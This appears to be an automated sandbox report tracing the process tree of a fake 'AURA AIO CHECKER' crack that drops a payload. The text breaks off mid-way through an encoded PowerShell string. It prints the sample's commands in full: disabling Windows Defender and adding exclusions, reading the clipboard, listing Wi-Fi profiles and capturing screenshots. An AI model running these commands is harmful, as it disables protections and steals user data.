    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6720 -childID 11 -isForBrowser -prefsHandle 6732 -prefMapHandle 4492 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca5b1609-ac35-40ef-aeb3-675fde8597e5} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:2996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7180 -childID 12 -isForBrowser -prefsHandle 7172 -prefMapHandle 6732 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {688230f0-afb1-4eb9-aaed-f33298384857} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6592 -childID 13 -isForBrowser -prefsHandle 1432 -prefMapHandle 7120 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2d2f760-5988-4368-a3fa-75959d2a743d} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:4336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 14 -isForBrowser -prefsHandle 7412 -prefMapHandle 7408 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26c4d74d-5153-412f-8f09-9870722b3630} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 15 -isForBrowser -prefsHandle 6284 -prefMapHandle 5336 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1b179cb-fa16-4b88-af20-119496b2d5b5} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7592 -childID 16 -isForBrowser -prefsHandle 7596 -prefMapHandle 5308 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c10a92a-a983-4821-83f1-d7469aefda7d} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6716 -childID 17 -isForBrowser -prefsHandle 4816 -prefMapHandle 5088 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1c8cbb1-1406-4a36-b4fe-96089f055c60} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:3508
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8048 -childID 18 -isForBrowser -prefsHandle 8008 -prefMapHandle 8040 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ed00be5-4a8e-4932-ab78-2279094236a8} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:3244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6864 -parentBuildID 20240401114208 -prefsHandle 1404 -prefMapHandle 8260 -prefsLen 30532 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39a42840-9bdc-4974-8d1a-423d9c27b55b} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" rdd
    3⤵
    PID:1316
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 8368 -prefMapHandle 6248 -prefsLen 30532 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7456c0d-3b95-4c1b-a246-f851b5b1bee4} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" utility
    3⤵
    - Checks processor information in registry
    PID:2324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8668 -childID 19 -isForBrowser -prefsHandle 4612 -prefMapHandle 5064 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {597ff1b7-459e-4a9e-93c1-ac138906c1e3} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8932 -childID 20 -isForBrowser -prefsHandle 8916 -prefMapHandle 8924 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd61a3e8-4943-42ab-a88b-e41034b85b58} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:3480
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8320 -childID 21 -isForBrowser -prefsHandle 6696 -prefMapHandle 7976 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af941e7b-df4c-4cc1-ba80-878da17a8465} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:1528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7632 -childID 22 -isForBrowser -prefsHandle 7504 -prefMapHandle 7540 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae13bac0-2ab0-44ed-bf07-8e1971d5109c} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:1464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6560 -childID 23 -isForBrowser -prefsHandle 3664 -prefMapHandle 2564 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a7c6597-df67-44c2-a508-8485aafb3032} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9284 -childID 24 -isForBrowser -prefsHandle 3664 -prefMapHandle 9352 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b9cea9b-4952-401b-b0ac-0e0d08ac80f2} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5832
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9488 -childID 25 -isForBrowser -prefsHandle 9492 -prefMapHandle 9496 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d146c1cf-af00-4b57-89ff-40af861c9ea0} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9264 -childID 26 -isForBrowser -prefsHandle 9772 -prefMapHandle 6560 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bcc71e1-a89a-4cc1-8a66-33729dca420e} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:6624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6244 -childID 27 -isForBrowser -prefsHandle 7584 -prefMapHandle 8508 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cba02948-02d7-4fc2-b897-c7f795bd5143} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:6940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9484 -childID 28 -isForBrowser -prefsHandle 9940 -prefMapHandle 6604 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {331fcbb9-db05-4488-8055-9b2e838048ac} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:7560
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9836 -childID 29 -isForBrowser -prefsHandle 9664 -prefMapHandle 9660 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28c6c851-2d92-4176-9d99-80e7d61a19e4} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:7340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8228 -childID 30 -isForBrowser -prefsHandle 7688 -prefMapHandle 9636 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8786a497-779a-4a44-8944-124fd037e293} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:4016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8032 -childID 31 -isForBrowser -prefsHandle 10216 -prefMapHandle 7716 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17508de2-04cb-4c91-b964-753759c2940d} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8060 -childID 32 -isForBrowser -prefsHandle 8044 -prefMapHandle 8528 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {315003e2-a520-45d8-94ee-fb9731b84220} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:2924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9728 -childID 33 -isForBrowser -prefsHandle 9028 -prefMapHandle 9024 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6efdc19-d2cc-439f-9318-2ffcfd79889b} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:6888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9564 -childID 34 -isForBrowser -prefsHandle 10112 -prefMapHandle 9308 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea4bd55e-2098-4d97-aa74-0c37941c5c96} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:4888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9212 -childID 35 -isForBrowser -prefsHandle 9524 -prefMapHandle 9792 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32e2c4e0-2798-463d-9bf6-1ad3936526b7} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:7936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5068 -childID 36 -isForBrowser -prefsHandle 7344 -prefMapHandle 9176 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e9a4423-cf59-46aa-9d5e-e779478a9469} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:6792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9648 -childID 37 -isForBrowser -prefsHandle 9284 -prefMapHandle 9480 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {281968c5-72e8-4913-a5a2-a396f78f83bb} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5672
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10100 -childID 38 -isForBrowser -prefsHandle 9164 -prefMapHandle 8196 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea385cf7-4cc5-4445-89e3-bffb909baa13} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:6112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10556 -childID 39 -isForBrowser -prefsHandle 10348 -prefMapHandle 9340 -prefsLen 28282 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c0f2939-21e7-4400-8313-9ba27f85d5fd} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6160

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\" -spe -an -ai#7zMap32298:120:7zEvent217
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4180

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\Password.txt
1⤵
PID:6612

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\" -spe -an -ai#7zMap1961:240:7zEvent32431
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4912

C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe
"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6060

C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\crack.exe
"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\crack.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6456
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAYgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAcwBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdABnACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6492
- C:\Users\Admin\AppData\Local\Temp\Payload.exe
  "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  PID:1404
- C:\Users\Admin\AppData\Local\Temp\crack.exe
  "C:\Users\Admin\AppData\Local\Temp\crack.exe"
  2⤵
  - Executes dropped EXE
  PID:4144
- - C:\Users\Admin\AppData\Local\Temp\crack.exe
    "C:\Users\Admin\AppData\Local\Temp\crack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\crack.exe'"
      4⤵
      PID:7056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\crack.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:7080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:7136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5732
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6316
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:432
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:6472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4500
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6720
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:6888
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:6932
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:7580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAE